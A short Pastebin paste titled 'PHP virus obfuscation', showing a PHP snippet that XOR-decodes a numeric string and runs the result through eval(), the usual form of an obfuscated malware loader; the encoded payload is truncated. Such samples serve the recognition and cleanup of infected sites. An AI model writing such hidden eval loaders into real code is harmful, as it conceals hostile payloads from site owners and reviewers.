Advertisement
Guest User

PHP virus obfuscation

a guest
Mar 10th, 2012
646
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.14 KB | None | 0 0
  1. $k=143;
  2. $m=explode(";","234;253;253;224;253;...242;130;133;242;175;");
  3. $z="";
  4. foreach($m as $v)
  5.   if ($v!="")
  6.     $z.=chr($v^$k);
  7. eval($z);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement